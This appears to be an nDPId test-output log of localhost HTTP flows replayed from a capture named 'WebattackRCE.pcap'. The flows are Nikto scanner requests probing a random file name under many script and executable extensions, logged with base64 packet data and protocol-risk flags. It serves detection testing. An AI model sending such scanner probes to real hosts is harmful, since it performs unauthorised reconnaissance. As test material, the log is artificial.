01056{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":11,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420276675,"flow_last_seen":1576420276675,"flow_idle_time":7580000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"midstream":1,"thread_ts_msec":1576420276675,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49564,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/0hXC6ZUE.cgi","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:map_codes)"}}
00589{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":12,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420276676,"flow_last_seen":1576420276676,"flow_idle_time":7580000,"flow_min_l4_payload_len":147,"flow_max_l4_payload_len":147,"flow_tot_l4_payload_len":147,"midstream":1,"thread_ts_msec":1576420276676,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49566,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00671{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":12,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":12,"flow_packet_id":1,"flow_last_seen":1576420276676,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":213,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":213,"pkt_l4_len":179,"thread_ts_msec":1576420276676,"pkt":"AAAAAAAAAAAAAAAACABFAADHEPBAAEAGKz9\/AAABfwAAAcGeH5DFGykA4SBK+YAYAED+uwAAAQEICp1m+uydZvrsR0VUIC8waFhDNlpVRS4xMDoxMDAgSFRUUC8xLjENCkhvc3Q6IDEyNy4wLjAuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0Om1hcF9jb2RlcykNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCg0K"}
01059{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":12,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420276676,"flow_last_seen":1576420276676,"flow_idle_time":7580000,"flow_min_l4_payload_len":147,"flow_max_l4_payload_len":147,"flow_tot_l4_payload_len":147,"midstream":1,"thread_ts_msec":1576420276676,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49566,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/0hXC6ZUE.10:100","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:map_codes)"}}
00589{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":13,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420276677,"flow_last_seen":1576420276677,"flow_idle_time":7580000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"midstream":1,"thread_ts_msec":1576420276677,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49568,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00669{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":13,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":13,"flow_packet_id":1,"flow_last_seen":1576420276677,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":210,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":210,"pkt_l4_len":176,"thread_ts_msec":1576420276677,"pkt":"AAAAAAAAAAAAAAAACABFAADECABAAEAGNDJ\/AAABfwAAAcGgH5BVFT\/w+l\/OFYAYAED+uAAAAQEICp1m+u2dZvrtR0VUIC8waFhDNlpVRS5leGUgSFRUUC8xLjENCkhvc3Q6IDEyNy4wLjAuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0Om1hcF9jb2RlcykNCg0K"}
01056{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":13,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420276677,"flow_last_seen":1576420276677,"flow_idle_time":7580000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"midstream":1,"thread_ts_msec":1576420276677,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49568,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/0hXC6ZUE.exe","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:map_codes)"}}
00589{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":14,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420276678,"flow_last_seen":1576420276678,"flow_idle_time":7580000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420276678,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49570,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00671{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":14,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":14,"flow_packet_id":1,"flow_last_seen":1576420276678,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":211,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":211,"pkt_l4_len":177,"thread_ts_msec":1576420276678,"pkt":"AAAAAAAAAAAAAAAACABFAADFtjJAAEAGhf5\/AAABfwAAAcGiH5AIK44ii9cP6IAYAED+uQAAAQEICp1m+u6dZvruR0VUIC8waFhDNlpVRS5waHAzIEhUVFAvMS4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6bWFwX2NvZGVzKQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="}
01057{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":14,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420276678,"flow_last_seen":1576420276678,"flow_idle_time":7580000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420276678,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49570,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/0hXC6ZUE.php3","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:map_codes)"}}
00589{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":15,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420276679,"flow_last_seen":1576420276679,"flow_idle_time":7580000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"midstream":1,"thread_ts_msec":1576420276679,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49572,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00667{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":15,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":15,"flow_packet_id":1,"flow_last_seen":1576420276679,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":210,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":210,"pkt_l4_len":176,"thread_ts_msec":1576420276679,"pkt":"AAAAAAAAAAAAAAAACABFAADEHFNAAEAGH99\/AAABfwAAAcGkH5DblSRB+hg5GYAYAED+uAAAAQEICp1m+u+dZvrvR0VUIC8waFhDNlpVRS5iYXQgSFRUUC8xLjENCkhvc3Q6IDEyNy4wLjAuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0Om1hcF9jb2RlcykNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCg0K"}
01056{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":15,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420276679,"flow_last_seen":1576420276679,"flow_idle_time":7580000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"midstream":1,"thread_ts_msec":1576420276679,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49572,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/0hXC6ZUE.bat","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:map_codes)"}}
00589{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":16,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420276680,"flow_last_seen":1576420276680,"flow_idle_time":7580000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420276680,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49574,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00663{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":16,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":16,"flow_packet_id":1,"flow_last_seen":1576420276680,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":207,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":207,"pkt_l4_len":173,"thread_ts_msec":1576420276680,"pkt":"AAAAAAAAAAAAAAAACABFAADBM9JAAEAGCGN\/AAABfwAAAcGmH5Br4QvDZx90z4AYAED+tQAAAQEICp1m+vCdZvrwR0VUIC8waFhDNlpVRS8gSFRUUC8xLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDptYXBfY29kZXMpDQpIb3N0OiAxMjcuMC4wLjENCg0K"}
01054{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":16,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420276680,"flow_last_seen":1576420276680,"flow_idle_time":7580000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420276680,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49574,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/0hXC6ZUE\/","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:map_codes)"}}
00589{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":17,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420276681,"flow_last_seen":1576420276681,"flow_idle_time":7580000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"midstream":1,"thread_ts_msec":1576420276681,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49576,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00667{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":17,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":17,"flow_packet_id":1,"flow_last_seen":1576420276681,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":210,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":210,"pkt_l4_len":176,"thread_ts_msec":1576420276681,"pkt":"AAAAAAAAAAAAAAAACABFAADEACBAAEAGPBJ\/AAABfwAAAcGoH5CXxDgNS2MhWYAYAED+uAAAAQEICp1m+vGdZvrxR0VUIC8waFhDNlpVRS5jZm0gSFRUUC8xLjENCkhvc3Q6IDEyNy4wLjAuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0Om1hcF9jb2RlcykNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCg0K"}
01056{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":17,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420276681,"flow_last_seen":1576420276681,"flow_idle_time":7580000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"midstream":1,"thread_ts_msec":1576420276681,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49576,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/0hXC6ZUE.cfm","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:map_codes)"}}
00589{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":18,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420276683,"flow_last_seen":1576420276683,"flow_idle_time":7580000,"flow_min_l4_payload_len":143,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":143,"midstream":1,"thread_ts_msec":1576420276683,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49578,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00667{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":18,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":18,"flow_packet_id":1,"flow_last_seen":1576420276683,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":209,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":209,"pkt_l4_len":175,"thread_ts_msec":1576420276683,"pkt":"AAAAAAAAAAAAAAAACABFAADDkEpAAEAGq+h\/AAABfwAAAcGqH5CEAqhbm4E5vYAYAED+twAAAQEICp1m+vKdZvryR0VUIC8waFhDNlpVRS5wbCBIVFRQLzEuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0Om1hcF9jb2RlcykNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="}
01055{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":18,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420276683,"flow_last_seen":1576420276683,"flow_idle_time":7580000,"flow_min_l4_payload_len":143,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":143,"midstream":1,"thread_ts_msec":1576420276683,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49578,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/0hXC6ZUE.pl","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:map_codes)"}}
00589{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":19,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420276685,"flow_last_seen":1576420276685,"flow_idle_time":7580000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"midstream":1,"thread_ts_msec":1576420276685,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49580,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00667{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":19,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":19,"flow_packet_id":1,"flow_last_seen":1576420276685,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":210,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":210,"pkt_l4_len":176,"thread_ts_msec":1576420276685,"pkt":"AAAAAAAAAAAAAAAACABFAADE6exAAEAGUkV\/AAABfwAAAcGsH5Ci99H6PnUDOIAYAED+uAAAAQEICp1m+vWdZvr1R0VUIC8waFhDNlpVRS5jbWQgSFRUUC8xLjENCkhvc3Q6IDEyNy4wLjAuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0Om1hcF9jb2RlcykNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCg0K"}
01056{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":19,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420276685,"flow_last_seen":1576420276685,"flow_idle_time":7580000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"midstream":1,"thread_ts_msec":1576420276685,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49580,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/0hXC6ZUE.cmd","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:map_codes)"}}
00589{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":20,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420276686,"flow_last_seen":1576420276686,"flow_idle_time":7580000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"midstream":1,"thread_ts_msec":1576420276686,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49582,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00667{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":20,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":20,"flow_packet_id":1,"flow_last_seen":1576420276686,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":210,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":210,"pkt_l4_len":176,"thread_ts_msec":1576420276686,"pkt":"AAAAAAAAAAAAAAAACABFAADEl0RAAEAGpO1\/AAABfwAAAcGuH5BUwq9SBePOj4AYAED+uAAAAQEICp1m+vadZvr2R0VUIC8waFhDNlpVRS5odG0gSFRUUC8xLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDptYXBfY29kZXMpDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpIb3N0OiAxMjcuMC4wLjENCg0K"}
01056{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":20,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420276686,"flow_last_seen":1576420276686,"flow_idle_time":7580000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"midstream":1,"thread_ts_msec":1576420276686,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49582,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/0hXC6ZUE.htm","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:map_codes)"}}
00589{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":21,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420276687,"flow_last_seen":1576420276687,"flow_idle_time":7580000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420276687,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49584,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00671{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":21,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":21,"flow_packet_id":1,"flow_last_seen":1576420276687,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":211,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":211,"pkt_l4_len":177,"thread_ts_msec":1576420276687,"pkt":"AAAAAAAAAAAAAAAACABFAADFbA5AAEAG0CJ\/AAABfwAAAcGwH5CxUlQZUrozMIAYAED+uQAAAQEICp1m+vedZvr3R0VUIC8waFhDNlpVRS5odG1sIEhUVFAvMS4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6bWFwX2NvZGVzKQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="}
01057{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":21,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420276687,"flow_last_seen":1576420276687,"flow_idle_time":7580000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420276687,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49584,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/0hXC6ZUE.html","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:map_codes)"}}
00589{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":22,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420276689,"flow_last_seen":1576420276689,"flow_idle_time":7580000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"midstream":1,"thread_ts_msec":1576420276689,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49586,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00667{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":22,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":22,"flow_packet_id":1,"flow_last_seen":1576420276689,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":210,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":210,"pkt_l4_len":176,"thread_ts_msec":1576420276689,"pkt":"AAAAAAAAAAAAAAAACABFAADEYhpAAEAG2hd\/AAABfwAAAcGyH5BKOloN5Bjd7oAYAED+uAAAAQEICp1m+vmdZvr5R0VUIC8waFhDNlpVRS5kbGwgSFRUUC8xLjENCkhvc3Q6IDEyNy4wLjAuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0Om1hcF9jb2RlcykNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCg0K"}
